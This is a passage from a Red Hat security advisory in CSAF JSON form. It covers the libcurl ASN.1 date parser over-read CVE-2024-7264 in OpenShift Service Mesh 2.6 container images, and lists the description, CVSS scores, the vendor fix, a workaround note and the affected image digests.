"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-7264",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2024-07-31T04:33:09+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2301888"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libcurl, where libcurl\u0027s ASN1 parser code has the `GTime2str()` function, used for parsing an ASN.1 Generalized Time field. If a syntactically incorrect field is given, the parser can use -1 for the length of the *time fraction*, leading to a `strlen()` performed on a pointer to a heap buffer area that is not purposely NULL terminated.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "curl: libcurl: ASN.1 date parser overread",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability is classified as low severity because it primarily results in a heap buffer over-read rather than a direct memory corruption or code execution risk. Since the ASN.1 parsing occurs after a successful TLS handshake, the malformed certificate must first bypass the TLS library\u0027s validation, which significantly reduces the likelihood of exploitation. \n\nAdditionally, the impact is limited to a potential crash or unintended heap data exposure through CURLINFO_CERTINFO, but not arbitrary code execution. The requirement for a specific TLS backend configuration and the controlled nature of the memory read further minimize its exploitability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-7264"
},
{
"category": "external",
"summary": "RHBZ#2301888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-7264",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264"
},
{
"category": "external",
"summary": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL",
"url": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL"
}
],
"release_date": "2024-07-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.\n\nRed Hat build of curl uses OpenSSL, which is not included in the affected list of GnuTLS, Schannel, Secure Transport and mbedTLS. Inspect which TLS backend is in use by running:\n\n$ curl --version\n\nCheck the reference for curl handled by the maintainers which may contain more relevant information around this vulnerability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
